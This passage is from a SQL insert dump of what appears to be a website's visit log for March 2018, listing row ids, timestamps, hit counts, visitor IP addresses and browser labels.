1,0,0,'66.249.66.195','chrome'),(220400,1521071018,1,1,0,0,'66.249.66.158','chrome'),(220401,1521071258,1,1,0,0,'141.8.142.74','other'),(220402,1521071320,2,2,0,0,'46.211.145.194','chrome'),(220403,1521071445,1,1,0,0,'54.197.45.201','other'),(220404,1521072349,1,1,0,0,'54.197.45.201','other'),(220405,1521072471,5,5,0,0,'141.8.142.74','other'),(220406,1521072474,4,4,0,0,'178.154.171.88','other'),(220407,1521072491,3,3,0,0,'87.250.224.46','other'),(220408,1521072494,1,1,0,0,'37.9.113.182','other'),(220409,1521072512,1,1,0,0,'54.36.148.131','other'),(220410,1521072801,1,1,0,0,'54.88.210.88','other'),(220411,1521072872,1,1,0,0,'54.36.149.35','other'),(220412,1521073340,1,1,0,0,'54.197.45.201','other'),(220413,1521073361,1,1,0,0,'54.36.149.77','other'),(220414,1521073561,1,0,1,0,'66.249.66.201',''),(220415,1521073598,1,1,0,0,'52.91.126.143','other'),(220416,1521073697,1,1,0,0,'54.36.148.115','other'),(220417,1521073721,1,1,0,0,'54.88.210.88','other'),(220418,1521074277,1,1,0,0,'54.197.45.201','other'),(220419,1521074628,1,1,0,0,'54.88.210.88','other'),(220420,1521074646,1,1,0,0,'52.91.126.143','other'),(220421,1521074827,1,1,0,0,'54.36.148.202','other'),(220422,1521074921,1,1,0,0,'8.29.198.26','other'),(220423,1521074931,1,1,0,0,'54.36.148.96','other'),(220424,1521075042,1,1,0,0,'66.249.66.195','chrome'),(220425,1521075175,1,1,0,0,'54.36.149.44','other'),(220426,1521075200,1,1,0,0,'54.197.45.201','other'),(220427,1521075334,2,2,0,0,'40.77.167.126','other'),(220428,1521075538,1,0,1,0,'66.249.66.199',''),(220429,1521075545,1,1,0,0,'54.88.210.88','other'),(220430,1521075691,1,1,0,0,'54.36.148.97','other'),(220431,1521075942,1,1,0,0,'52.91.126.143','other'),(220432,1521075952,1,1,0,0,'52.72.78.96','other'),(220433,1521075955,1,1,0,0,'54.36.149.3','other'),(220434,1521075962,1,1,0,0,'54.36.148.146','other'),(220435,1521076025,1,1,0,0,'54.36.148.28','other'),(220436,1521076124,1,1,0,0,'54.197.45.201','other'),(220437,1521076434,1,1,0,0,'178.154.171.88','other'),(220438,1521076463,1,1,0,0,'54.88.210.88','other'),(220439,1521076465,1,1,0,0,'66.249.66.201','chrome'),(220440,1521076467,1,1,0,0,'66.249.66.157','chrome'),(220441,1521076475,1,1,0,0,'54.36.148.214','other'),(220442,1521076631,1,1,0,0,'54.36.148.238','other'),(220443,1521076724,1,0,1,0,'66.249.66.195',''),(220444,1521076727,1,1,0,0,'54.36.148.130','other'),(220445,1521076845,1,1,0,0,'52.91.126.143','other'),(220446,1521076872,1,1,0,0,'52.72.78.96','other'),(220447,1521077051,1,1,0,0,'66.249.66.199','chrome'),(220448,1521077081,1,1,0,0,'54.197.45.201','other'),(220449,1521077367,1,1,0,0,'54.88.210.88','other'),(220450,1521077796,1,1,0,0,'52.72.78.96','other'),(220451,1521077929,1,1,0,0,'54.36.148.35','other'),(220452,1521077995,1,1,0,0,'54.36.148.175','other'),(220453,1521078078,1,1,0,0,'54.197.45.201','other'),(220454,1521078291,1,1,0,0,'54.36.149.57','other'),(220455,1521078293,1,1,0,0,'54.88.210.88','other'),(220456,1521078313,1,1,0,0,'54.36.148.184','other'),(220457,1521078460,1,1,0,0,'54.67.59.131','chrome'),(220458,1521078494,1,1,0,0,'54.36.148.94','other'),(220459,1521078717,1,1,0,0,'52.72.78.96','other'),(220460,1521078864,1,1,0,0,'52.91.126.143','other'),(220461,1521078880,1,1,0,0,'54.36.148.118','other'),(220462,1521078979,1,0,1,0,'66.249.66.157',''),(220463,1521079079,1,1,0,0,'54.197.45.201','other'),(220464,1521079210,1,1,0,0,'87.250.224.46','other'),(220465,1521079216,1,1,0,0,'54.88.210.88','other'),(220466,1521079643,1,1,0,0,'52.72.78.96','other'),(220467,1521079781,1,1,0,0,'52.91.126.143','other'),(220468,1521079888,1,1,0,0,'178.255.215.94','other'),(220469,1521079911,1,1,0,0,'54.165.59.7','other'),(220470,1521080006,1,1,0,0,'54.36.148.215','other'),(220471,1521080081,1,0,1,0,'66.249.66.156',''),(220472,1521080099,1,1,0,0,'54.197.45.201','other'),(220473,1521080133,1,1,0,0,'54.88.210.88','other'),(220474,1521080295,1,1,0,0,'54.36.148.54','other'),(220475,1521080560,1,1,0,0,'52.72.78.96','other'),(220476,1521080617,1,1,0,0,'54.36.148.57','other'),(220477,1521080739,1,1,0,0,'52.91.126.143','other'),(220478,1521080820,1,1,0,0,'54.36.148.232','other'),(220479,1521080866,1,1,0,0,'54.36.148.173','other'),(220480,1521080941,1,1,0,0,'54.36.149.20','other'),(220481,1521081005,1,1,0,0,'54.197.45.201','other'),(220482,1521081011,1,0,1,0,'66.249.66.195',''),(220483,1521081048,1,1,0,0,'54.88.210.88','other'),(220484,1521081158,1,1,0,0,'54.36.148.167','other'),(220485,1521081468,1,1,0,0,'52.72.78.96','other'),(220486,1521081707,1,1,0,0,'52.91.126.143','other'),(220487,1521081729,1,1,0,0,'54.36.149.21','other'),(220488,1521081966,1,1,0,0,'54.88.210.88','other'),(220489,1521081984,1,1,0,0,'54.197.45.201','other'),(220490,1521082093,1,1,0,0,'66.249.66.195','chrome'),(220491,1521082101,1,1,0,0,'66.249.66.157','chrome'),(220492,1521082385,1,1,0,0,'52.72.78.96','other'),(220493,1521082446,1,1,0,0,'54.36.148.204','other'),(220494,1521082878,1,1,0,0,'52.91.126.143','other'),(220495,1521082913,1,1,0,0,'141.8.142.74','other'),(220496,1521082940,1,1,0,0,'54.197.45.201','other'),(220497,1521082960,1,1,0,0,'178.154.171.88','other'),(220498,1521082970,1,1,0,0,'180.76.15.16','other'),(220499,1521083060,1,1,0,0,'54.88.210.88','other'),(220500,1521083304,1,1,0,0,'52.72.78.96','other'),(220501,1521083846,1,1,0,0,'54.36.149.44','other'),(220502,1521083877,1,1,0,0,'54.197.45.201','other'),(220503,1521083928,1,1,0,0,'52.91.126.143','other'),(220504,1521083975,2,0,2,0,'66.249.66.195',''),(220505,1521083983,1,1,0,0,'54.88.210.88','other'),(220506,1521084208,1,1,0,0,'52.72.78.96','other'),(220507,1521084399,2,2,0,0,'54.36.148.65','other'),(220508,1521084469,1,1,0,0,'141.8.142.74','other'),(220509,1521084585,2,2,0,0,'87.250.224.46','other'),(220510,1521084711,1,1,0,0,'54.36.148.178','other'),(220511,1521084809,1,1,0,0,'54.197.45.201','other'),(220512,1521084840,1,0,1,0,'66.249.66.201',''),(220513,1521084900,1,1,0,0,'54.88.210.88','other'),(220514,1521084943,1,1,0,0,'52.91.126.143','other'),(220515,1521084953,2,2,0,0,'54.36.148.162','other'),(220516,1521084970,1,1,0,0,'180.76.15.144','other'),(220517,1521085127,1,1,0,0,'52.72.78.96','other'),(220518,1521085553,1,1,0,0,'54.36.149.89','other'),(220519,1521085563,1,1,0,0,'37.9.113.182','other'),(220520,1521085722,1,1,0,0,'37.9.113.100','other'),(220521,1521085738,1,0,1,0,'66.249.66.156',''),(220522,1521085750,1,1,0,0,'8.29.198.26','other'),(220523,1521085756,1,1,0,0,'54.197.45.201','other'),(220524,1521085775,1,1,0,0,'54.36.149.29','other'),(220525,1521085816,1,1,0,0,'54.88.210.88','other'),(220526,1521086011,1,1,0,0,'52.91.126.143','other'),(220527,1521086045,1,1,0,0,'52.72.78.96','other'),(220528,1521086356,1,1,0,0,'54.36.149.86','other'),(220529,1521086459,1,1,0,0,'54.36.149.44','other'),(220530,1521086716,1,1,0,0,'54.36.148.49','other'),(220531,1521086723,1,1,0,0,'54.197.45.201','other'),(220532,1521086778,1,1,0,0,'54.88.210.88','other'),(220533,1521086792,1,1,0,0,'54.36.148.144','other'),(220534,1521086796,1,1,0,0,'178.154.171.88','other'),(220535,1521086861,1,0,1,0,'66.249.66.158',''),(220536,1521086959,1,1,0,0,'52.91.126.143','other'),(220537,1521087095,1,1,0,0,'54.36.148.157','other'),(220538,1521087101,1,1,0,0,'54.36.148.42','other'),(220539,1521087136,1,0,1,0,'66.249.66.156',''),(220540,1521087144,1,1,0,0,'52.72.78.96','other'),(220541,1521087411,1,1,0,0,'54.36.148.122','other'),(220542,1521087684,1,1,0,0,'54.36.148.95','other'),(220543,1521087688,1,1,0,0,'54.88.210.88','other'),(220544,1521087776,1,1,0,0,'54.197.45.201','other'),(220545,1521087913,1,1,0,0,'52.91.126.143','other'),(220546,1521088059,1,1,0,0,'52.72.78.96','other'),(220547,1521088165,1,0,1,0,'66.249.66.199',''),(220548,1521088412,1,1,0,0,'54.36.148.21','other'),(220549,1521088414,1,1,0,0,'54.36.148.215','other'),(220550,1521088421,1,1,0,0,'109.169.46.22','chrome'),(220551,1521088506,1,1,0,0,'54.36.149.37','other'),(220552,1521088536,1,1,0,0,'141.8.142.74','other'),(220553,1521088605,1,1,0,0,'54.88.210.88','other'),(220554,1521088970,1,1,0,0,'180.76.15.16','other'),(220555,1521088972,1,1,0,0,'52.91.126.143','other'),(220556,1521088977,1,1,0,0,'52.72.78.96','other'),(220557,1521089267,1,0,1,0,'66.249.66.201',''),(220558,1521089427,1,1,0,0,'54.197.45.201','other'),(220559,1521089430,1,1,0,0,'66.249.66.201','chrome'),(220560,1521089433,1,1,0,0,'66.249.66.156','chrome'),(220561,1521089522,1,1,0,0,'54.88.210.88','other'),(220562,1521089864,1,0,1,0,'66.249.66.199',''),(220563,1521089895,1,1,0,0,'52.72.78.96','other'),(220564,1521090102,1,1,0,0,'52.91.126.143','other'),(220565,1521090433,1,1,0,0,'54.88.210.88','other'),(220566,1521090437,1,1,0,0,'54.36.148.207','other'),(220567,1521090458,1,1,0,0,'207.46.13.72','other'),(220568,1521090537,1,1,0,0,'54.36.149.66','other'),(220569,1521090757,1,1,0,0,'54.36.149.92','other'),(220570,1521090799,1,1,0,0,'54.36.148.44','other'),(220571,1521090801,1,1,0,0,'52.72.78.96','other'),(220572,1521090842,1,1,0,0,'141.8.132.19','other'),(220573,1521091102,1,1,0,0,'54.197.45.201','other'),(220574,1521091224,1,1,0,0,'52.91.126.143','other'),(220575,1521091362,1,1,0,0,'54.88.210.88','other'),(220576,1521091670,1,1,0,0,'91.196.177.46','chrome'),(220577,1521091888,1,1,0,0,'52.72.78.96','other'),(220578,1521091933,3,0,3,0,'66.249.66.199',''),(220579,1521092089,1,1,0,0,'54.197.45.201','other'),(220580,1521092092,1,1,0,0,'54.36.148.23','other'),(220581,1521092147,1,1,0,0,'54.36.148.247','other'),(220582,1521092243,1,1,0,0,'54.36.148.142','other'),(220583,1521092291,1,1,0,0,'54.88.210.88','other'),(220584,1521092302,1,1,0,0,'52.91.126.143','other'),(220585,1521092508,1,1,0,0,'54.36.148.131','other'),(220586,1521092814,1,1,0,0,'52.72.78.96','other'),(220587,1521093134,1,1,0,0,'54.197.45.201','other'),(220588,1521093215,1,1,0,0,'54.88.210.88','other'),(220589,1521093243,1,1,0,0,'52.91.126.143','other'),(220590,1521093333,1,1,0,0,'54.36.149.35','other'),(220591,1521093746,1,1,0,0,'52.72.78.96','other'),(220592,1521094031,2,2,0,0,'77.111.244.34','chrome'),(220593,1521094137,1,1,0,0,'54.88.210.88','other'),(220594,1521094203,1,1,0,0,'34.239.248.162','other'),(220595,1521094579,1,0,1,0,'66.249.66.195',''),(220596,1521094580,1,0,1,0,'66.249.66.199',''),(220597,1521094622,1,1,0,0,'66.249.66.201','chrome'),(220598,1521094667,1,1,0,0,'52.72.78.96','other'),(220599,1521094710,1,1,0,0,'54.36.148.92','other'),(220600,1521094728,1,1,0,0,'54.36.149.97','other'),(220601,1521094954,1,1,0,0,'66.249.66.199','chrome'),(220602,1521094957,1,1,0,0,'178.154.171.88','other'),(220603,1521094958,1,1,0,0,'66.249.66.158','chrome'),(220604,1521095058,1,1,0,0,'54.88.210.88','other'),(220605,1521095106,1,1,0,0,'34.239.248.162','other'),(220606,1521095140,1,1,0,0,'54.36.149.5','other'),(220607,1521095152,15,15,0,0,'173.212.201.251','other'),(220608,1521095592,1,1,0,0,'52.72.78.96','other'),(220609,1521095596,1,1,0,0,'54.197.45.201','other'),(220611,1521095603,2,2,0,0,'91.196.178.93','chrome'),(220612,1521095735,1,1,0,0,'54.36.149.69','other'),(220613,1521095868,3,3,0,0,'178.154.171.88','other'),(220614,1521095971,2,2,0,0,'141.8.142.74','other'),(220615,1521095981,1,1,0,0,'54.88.210.88','other'),(220616,1521095990,1,1,0,0,'217.69.133.12','other'),(220617,1521096032,1,1,0,0,'109.169.46.22','firefox'),(220618,1521096118,1,1,0,0,'34.239.248.162','other'),(220619,1521096146,1,1,0,0,'54.36.148.202','other'),(220620,1521096194,1,1,0,0,'54.36.148.20','other'),(220621,1521096509,1,0,1,0,'66.249.66.157',''),(220622,1521096591,1,1,0,0,'8.29.198.25','other'),(220623,1521096624,1,1,0,0,'92.113.40.149','chrome'),(220624,1521096638,1,1,0,0,'52.72.78.96','other'),(220625,1521096748,1,1,0,0,'54.36.149.100','other'),(220626,1521096904,1,1,0,0,'54.88.210.88','other'),(220627,1521097149,1,1,0,0,'34.239.248.162','other'),(220628,1521097527,1,1,0,0,'54.36.148.240','other'),(220629,1521097547,8,8,0,0,'91.196.178.93','chrome'),(220630,1521097555,1,1,0,0,'52.72.78.96','other'),(220631,1521097558,1,1,0,0,'91.124.182.170','firefox'),(220632,1521097587,2,2,0,0,'178.154.171.88','other'),(220633,1521097723,1,1,0,0,'37.9.113.182','other'),(220634,1521097753,1,1,0,0,'37.54.205.214','chrome'),(220635,1521097784,69,69,0,0,'147.135.128.113','other'),(220636,1521097810,1,1,0,0,'54.88.210.88','other'),(220637,1521098093,1,1,0,0,'54.36.148.14','other'),(220638,1521098187,1,1,0,0,'54.36.148.110','other'),(220639,1521098204,1,1,0,0,'34.239.248.162','other'),(220640,1521098347,1,1,0,0,'54.36.148.43','other'),(220641,1521098478,1,1,0,0,'52.72.78.96','other'),(220642,1521098515,1,1,0,0,'107.167.105.14','other'),(220643,1521098652,1,1,0,0,'141.8.142.74','other'),(220644,1521098695,71,71,0,0,'147.135.128.113','other'),(220645,1521098728,1,1,0,0,'54.88.210.88','other'),(220646,1521098809,1,1,0,0,'217.69.136.207','other'),(220647,1521099146,1,1,0,0,'34.239.248.162','other'),(220648,1521099224,1,1,0,0,'54.36.149.42','other'),(220649,1521099327,1,1,0,0,'54.197.45.201','other'),(220650,1521099406,1,1,0,0,'52.72.78.96','other'),(220651,1521099537,1,1,0,0,'54.36.148.83','other'),(220652,1521099631,1,1,0,0,'54.88.210.88','other'),(220653,1521099751,1,1,0,0,'107.167.106.131','other'),(220654,1521099753,1,0,1,0,'66.249.66.199',''),(220655,1521099842,74,74,0,0,'147.135.128.113','other'),(220656,1521099979,1,1,0,0,'66.249.66.201','chrome'),(220657,1521099981,1,1,0,0,'66.249.66.156','chrome'),(220658,1521100046,1,1,0,0,'54.36.148.66','other'),(220659,1521100256,1,1,0,0,'34.239.248.162','other'),(220660,1521100332,1,1,0,0,'52.72.78.96','other'),(220661,1521100476,1,1,0,0,'163.172.255.139','chrome'),(220662,1521100539,1,1,0,0,'54.88.210.88','other'),(220663,1521100605,1,1,0,0,'54.36.148.118','other'),(220664,1521100749,73,73,0,0,'147.135.128.113','other'),(220665,1521100852,1,1,0,0,'54.36.149.107','other'),(220666,1521100929,1,1,0,0,'46.201.1.75','chrome'),(220667,1521101199,1,1,0,0,'34.239.248.162','other'),(220668,1521101260,1,1,0,0,'52.72.78.96','other'),(220669,1521101467,1,1,0,0,'54.88.210.88','other'),(220670,1521101524,1,1,0,0,'91.124.182.170','firefox'),(220671,1521101561,1,1,0,0,'217.69.133.226','other'),(220672,1521101658,61,61,0,0,'147.135.128.113','other'),(220673,1521101948,1,1,0,0,'54.36.148.138','other'),(220674,1521101996,1,1,0,0,'54.36.148.112','other'),(220675,1521102003,1,1,0,0,'54.36.149.92','other'),(220676,1521102120,1,1,0,0,'34.239.248.162','other'),(220677,1521102174,1,1,0,0,'52.72.78.96','other'),(220678,1521102395,1,1,0,0,'54.88.210.88','other'),(220679,1521102518,1,1,0,0,'91.196.178.101','chrome'),(220680,1521102566,76,76,0,0,'147.135.128.113','other'),(220681,1521102630,1,1,0,0,'54.36.148.223','other'),(220682,1521103004,1,1,0,0,'216.244.66.237','other'),(220683,1521103034,1,1,0,0,'34.239.248.162','other'),(220684,1521103091,1,1,0,0,'52.72.78.96','other'),(220685,1521103144,1,0,1,0,'66.249.66.195',''),(220686,1521103299,1,1,0,0,'54.88.210.88','other'),(220687,1521103353,1,1,0,0,'217.69.133.23','other'),(220688,1521103401,1,1,0,0,'54.36.149.77','other'),(220689,1521103467,76,76,0,0,'147.135.128.113','other'),(220690,1521103544,1,1,0,0,'54.36.149.42','other'),(220691,1521103712,1,1,0,0,'178.154.171.88','other'),(220692,1521103811,1,1,0,0,'54.36.148.179','other'),(220693,1521103983,2,2,0,0,'130.180.220.238','chrome'),(220694,1521103985,1,0,1,0,'66.249.66.201',''),(220695,1521104003,1,1,0,0,'37.9.113.182','other'),(220696,1521104009,1,1,0,0,'52.72.78.96','other'),(220697,1521104063,1,1,0,0,'34.239.248.162','other'),(220698,1521104208,1,1,0,0,'54.88.210.88','other'),(220699,1521104247,1,1,0,0,'178.251.107.33','chrome'),(220700,1521104373,46,46,0,0,'147.135.128.113','other'),(220701,1521104932,1,1,0,0,'52.72.78.96','other'),(220702,1521104994,1,1,0,0,'34.239.248.162','other'),(220703,1521105019,1,1,0,0,'54.197.45.201','other'),(220704,1521105023,1,1,0,0,'91.124.182.170','firefox'),(220705,1521105110,1,1,0,0,'54.36.149.68','other'),(220706,1521105116,1,1,0,0,'54.88.210.88','other'),(220707,1521105204,1,1,0,0,'54.36.149.96','other'),(220708,1521105327,1,1,0,0,'54.36.149.55','other'),(220709,1521105364,1,1,0,0,'54.36.149.48','other'),(220710,1521105500,1,1,0,0,'54.36.149.36','other'),(220711,1521105554,1,1,0,0,'217.69.133.12','other'),(220712,1521105713,1,1,0,0,'54.36.148.228','other'),(220713,1521105852,1,1,0,0,'52.72.78.96','other'),(220714,1521105881,1,1,0,0,'141.8.142.74','other'),(220715,1521106044,1,1,0,0,'54.88.210.88','other'),(220716,1521106098,1,1,0,0,'34.239.248.162','other'),(220717,1521106111,1,0,1,0,'66.249.66.199',''),(220718,1521106176,1,1,0,0,'54.36.148.231','other'),(220719,1521106458,1,1,0,0,'217.69.133.232','other'),(220720,1521106490,1,1,0,0,'54.36.149.17','other'),(220721,1521106776,1,1,0,0,'52.72.78.96','other'),(220722,1521106819,1,1,0,0,'91.210.250.248','chrome'),(220723,1521106951,1,1,0,0,'54.88.210.88','other'),(220724,1521107360,2,2,0,0,'34.239.248.162','other'),(220725,1521107428,1,1,0,0,'8.29.198.26','other'),(220726,1521107461,1,1,0,0,'54.36.148.243','other'),(220727,1521107578,1,1,0,0,'141.8.142.74','other'),(220728,1521107684,1,1,0,0,'52.72.78.96','other'),(220729,1521107783,1,1,0,0,'54.36.149.16','other'),(220730,1521107798,2,2,0,0,'91.196.177.46','chrome'),(220731,1521107855,1,1,0,0,'54.36.148.186','other'),(220732,1521107876,1,1,0,0,'54.88.210.88','other'),(220733,1521108211,1,1,0,0,'54.36.148.155','other'),(220734,1521108604,1,1,0,0,'52.72.78.96','other'),(220735,1521108799,1,1,0,0,'54.88.210.88','other'),(220736,1521108850,2,2,0,0,'34.239.248.162','other'),(220737,1521108985,1,1,0,0,'54.36.149.19','other'),(220738,1521109039,1,1,0,0,'54.36.148.242','other'),(220739,1521109412,1,1,0,0,'91.196.178.90','chrome'),(220740,1521109502,2,2,0,0,'188.231.245.51','chrome'),(220741,1521109526,1,1,0,0,'52.72.78.96','other'),(220742,1521109670,1,1,0,0,'91.196.178.101','chrome'),(220743,1521109689,1,1,0,0,'54.36.148.125','other'),(220744,1521109714,1,1,0,0,'54.88.210.88','other'),(220745,1521109926,1,1,0,0,'34.239.248.162','other'),(220746,1521110451,1,1,0,0,'52.72.78.96','other'),(220747,1521110480,1,0,1,0,'66.249.66.201',''),(220748,1521110593,1,1,0,0,'87.250.224.46','other'),(220749,1521110603,1,1,0,0,'66.249.66.195','chrome'),(220750,1521110608,1,1,0,0,'66.249.66.157','chrome'),(220751,1521110641,1,1,0,0,'54.88.210.88','other'),(220752,1521110649,3,3,0,0,'141.8.142.74','other'),(220753,1521110771,1,1,0,0,'54.197.45.201','other'),(220754,1521110942,2,2,0,0,'91.196.178.162','chrome'),(220755,1521111020,1,1,0,0,'54.36.148.23','other'),(220756,1521111375,1,1,0,0,'52.72.78.96','other'),(220757,1521111568,1,1,0,0,'54.88.210.88','other'),(220758,1521111635,1,1,0,0,'54.36.148.145','other'),(220759,1521111756,1,1,0,0,'77.111.244.37','chrome'),(220760,1521111794,1,1,0,0,'46.201.1.75','chrome'),(220761,1521111827,1,1,0,0,'34.239.248.162','other'),(220762,1521111981,3,3,0,0,'141.8.142.74','other'),(220763,1521112297,1,1,0,0,'52.72.78.96','other'),(220764,1521112319,2,2,0,0,'130.180.220.238','chrome'),(220765,1521112481,1,1,0,0,'54.88.210.88','other'),(220766,1521112611,1,1,0,0,'54.36.148.193','other'),(220767,1521112812,1,1,0,0,'54.36.148.159','other'),(220768,1521113051,1,0,1,0,'66.249.66.195',''),(220769,1521113148,1,1,0,0,'91.196.178.69','firefox'),(220770,1521113219,1,1,0,0,'52.72.78.96','other'),(220771,1521113383,1,1,0,0,'54.88.210.88','other'),(220772,1521113881,1,1,0,0,'54.36.148.126','other'),(220773,1521113972,1,0,1,0,'66.249.66.156',''),(220774,1521114059,1,1,0,0,'54.36.148.23','other'),(220775,1521114137,1,1,0,0,'52.72.78.96','other'),(220776,1521114147,1,1,0,0,'54.36.148.152','other'),(220777,1521114224,1,1,0,0,'54.36.148.220','other'),(220778,1521114284,1,1,0,0,'54.88.210.88','other'),(220779,1521114393,1,1,0,0,'54.36.148.54','other'),(220780,1521114665,1,1,0,0,'54.36.148.156','other'),(220781,1521114694,1,1,0,0,'54.36.148.222','other'),(220782,1521114953,2,2,0,0,'34.239.248.162','other'),(220783,1521115032,1,1,0,0,'91.196.178.9','chrome'),(220784,1521115059,1,1,0,0,'52.72.78.96','other'),(220785,1521115202,1,1,0,0,'54.88.210.88','other'),(220786,1521115268,1,1,0,0,'176.15.231.136','chrome'),(220787,1521115663,1,1,0,0,'54.197.45.201','other'),(220788,1521115760,1,1,0,0,'54.36.148.240','other'),(220789,1521115881,1,1,0,0,'141.8.142.74','other'),(220790,1521116039,1,1,0,0,'52.72.78.96','other'),(220791,1521116135,1,1,0,0,'54.36.149.14','other'),(220792,1521116176,1,1,0,0,'54.88.210.88','other'),(220793,1521116430,1,1,0,0,'193.194.127.207','chrome'),(220794,1521116442,1,1,0,0,'66.249.66.199','chrome'),(220795,1521116566,1,1,0,0,'54.197.45.201','other'),(220796,1521116596,1,1,0,0,'54.36.149.68','other'),(220797,1521116639,1,1,0,0,'54.36.148.157','other'),(220798,1521116672,1,1,0,0,'195.69.222.18','chrome'),(220799,1521116674,1,1,0,0,'178.154.171.88','other'),(220800,1521117054,1,1,0,0,'52.72.78.96','other'),(220801,1521117086,1,1,0,0,'54.88.210.88','other'),(220802,1521117131,1,1,0,0,'54.36.148.57','other'),(220803,1521117156,2,2,0,0,'91.196.177.46','chrome'),(220804,1521117244,1,1,0,0,'109.169.46.22','chrome'),(220805,1521117343,1,1,0,0,'91.124.182.170','firefox'),(220806,1521117358,2,2,0,0,'77.111.244.64','chrome'),(220807,1521117423,1,1,0,0,'54.36.148.58','other'),(220808,1521118045,1,1,0,0,'52.72.78.96','other'),(220809,1521118054,1,1,0,0,'54.88.210.88','other'),(220810,1521118224,1,1,0,0,'54.36.148.81','other'),(220811,1521118258,1,1,0,0,'8.29.198.25','other'),(220812,1521118365,1,1,0,0,'54.36.148.176','other'),(220813,1521118512,3,3,0,0,'141.8.142.74','other'),(220814,1521118557,1,1,0,0,'54.36.148.62','other'),(220815,1521118870,2,2,0,0,'34.239.248.162','other'),(220816,1521118952,1,1,0,0,'52.72.78.96','other'),(220817,1521118960,1,1,0,0,'54.88.210.88','other'),(220818,1521119053,1,1,0,0,'217.69.134.155','other'),(220819,1521119126,3,3,0,0,'130.180.217.89','chrome'),(220820,1521119235,1,1,0,0,'54.197.45.201','other'),(220821,1521119296,2,2,0,0,'130.180.220.238','chrome'),(220822,1521119314,1,1,0,0,'54.36.148.129','other'),(220823,1521119707,1,1,0,0,'54.36.148.43','other'),(220824,1521119812,2,2,0,0,'217.69.133.5','other'),(220825,1521119858,1,1,0,0,'34.239.248.162','other'),(220826,1521119878,1,1,0,0,'52.72.78.96','other'),(220827,1521119990,1,1,0,0,'217.69.134.161','other'),(220828,1521119999,1,1,0,0,'54.36.148.245','other'),(220829,1521120007,1,1,0,0,'54.88.210.88','other'),(220830,1521120106,1,1,0,0,'217.69.134.220','other'),(220831,1521120128,1,1,0,0,'178.154.171.88','other'),(220832,1521120200,1,1,0,0,'217.69.134.160','other'),(220833,1521120290,1,1,0,0,'217.69.134.175','other'),(220834,1521120292,1,1,0,0,'54.36.149.20','other'),(220835,1521120541,1,1,0,0,'217.69.134.188','other'),(220836,1521120593,1,1,0,0,'217.69.133.9','other'),(220837,1521120686,1,1,0,0,'91.196.178.162','firefox'),(220838,1521120723,2,2,0,0,'217.69.133.6','other'),(220839,1521120776,1,1,0,0,'54.36.148.120','other'),(220840,1521120784,1,1,0,0,'52.72.78.96','other'),(220841,1521121057,1,1,0,0,'54.36.148.179','other'),(220842,1521121071,2,2,0,0,'141.8.142.74','other'),(220843,1521121086,1,1,0,0,'54.88.210.88','other'),(220844,1521121161,1,1,0,0,'37.55.151.222','chrome'),(220845,1521121305,1,1,0,0,'54.36.149.80','other'),(220846,1521121719,1,1,0,0,'54.36.149.70','other'),(220847,1521121723,1,1,0,0,'109.169.46.22','chrome'),(220848,1521121741,1,1,0,0,'52.72.78.96','other'),(220849,1521121926,1,1,0,0,'54.36.149.71','other'),(220850,1521122036,1,1,0,0,'54.197.45.201','other'),(220851,1521122048,1,1,0,0,'54.36.148.71','other'),(220852,1521122093,2,2,0,0,'77.111.246.5','chrome'),(220853,1521122312,1,1,0,0,'178.154.171.88','other'),(220854,1521122315,2,2,0,0,'141.8.142.74','other'),(220855,1521122336,1,1,0,0,'54.88.210.88','other'),(220856,1521122426,1,1,0,0,'54.36.148.43','other'),(220857,1521122570,1,1,0,0,'54.36.148.41','other'),(220858,1521122634,1,1,0,0,'54.36.148.255','other'),(220859,1521122654,1,1,0,0,'52.72.78.96','other'),(220860,1521122965,1,1,0,0,'54.36.149.9','other'),(220861,1521123050,1,1,0,0,'54.36.148.59','other'),(220862,1521123138,1,1,0,0,'37.9.113.115','other'),(220863,1521123253,1,1,0,0,'54.88.210.88','other'),(220864,1521123391,1,1,0,0,'46.211.106.54','chrome'),(220865,1521123594,2,2,0,0,'34.239.248.162','other'),(220866,1521123716,1,1,0,0,'52.72.78.96','other'),(220867,1521123718,1,1,0,0,'87.250.224.46','other'),(220868,1521123813,1,0,1,0,'66.249.66.199',''),(220869,1521124001,1,1,0,0,'217.69.133.191','other'),(220870,1521124101,1,1,0,0,'54.36.148.60','other'),(220871,1521124527,1,0,1,0,'66.249.66.201',''),(220872,1521124532,1,1,0,0,'54.36.149.49','other'),(220873,1521124543,1,1,0,0,'54.88.210.88','other'),(220874,1521124659,1,1,0,0,'54.36.148.77','other'),(220875,1521124680,1,1,0,0,'52.72.78.96','other'),(220876,1521124895,4,4,0,0,'91.196.178.93','chrome'),(220877,1521124908,2,2,0,0,'141.8.142.74','other'),(220878,1521125009,1,1,0,0,'54.36.148.150','other'),(220879,1521125024,1,1,0,0,'54.36.149.41','other'),(220880,1521125039,1,1,0,0,'54.36.148.166','other'),(220881,1521125060,1,1,0,0,'54.197.45.201','other'),(220882,1521125073,1,1,0,0,'95.134.13.6','chrome'),(220883,1521125168,1,1,0,0,'54.36.149.23','other'),(220884,1521125170,1,1,0,0,'54.36.148.230','other'),(220885,1521125282,1,1,0,0,'54.36.149.73','other'),(220886,1521125481,1,1,0,0,'54.88.210.88','other'),(220887,1521125497,1,1,0,0,'195.60.231.136','chrome'),(220888,1521125744,1,1,0,0,'54.36.149.54','other'),(220889,1521125785,1,1,0,0,'52.72.78.96','other'),(220890,1521125859,2,2,0,0,'91.196.178.93','chrome'),(220891,1521126346,1,1,0,0,'54.36.149.22','other'),(220892,1521126402,1,1,0,0,'94.178.178.199','chrome'),(220893,1521126458,1,1,0,0,'188.230.43.254','other'),(220894,1521126475,1,1,0,0,'92.112.125.243','chrome'),(220895,1521126709,1,1,0,0,'52.72.78.96','other'),(220896,1521126899,1,1,0,0,'54.197.45.201','other'),(220897,1521127080,1,0,1,0,'66.249.66.199',''),(220898,1521127180,1,1,0,0,'141.8.142.74','other'),(220899,1521127448,1,1,0,0,'37.55.151.222','chrome'),(220900,1521127510,2,2,0,0,'91.196.178.162','chrome'),(220901,1521127566,1,1,0,0,'77.111.244.35','chrome'),(220902,1521127640,1,1,0,0,'52.72.78.96','other'),(220903,1521128192,1,1,0,0,'54.36.148.132','other'),(220904,1521128365,1,1,0,0,'54.36.148.67','other'),(220905,1521128426,1,1,0,0,'54.36.148.193','other'),(220906,1521128460,1,1,0,0,'141.8.142.74','other'),(220907,1521128492,1,1,0,0,'54.36.148.181','other'),(220908,1521128552,1,1,0,0,'52.72.78.96','other'),(220909,1521128777,1,1,0,0,'54.36.148.202','other'),(220910,1521128829,1,1,0,0,'54.36.148.146','other'),(220911,1521128857,1,1,0,0,'188.230.43.254','other'),(220912,1521128954,1,1,0,0,'54.197.45.201','other'),(220913,1521129064,1,1,0,0,'94.232.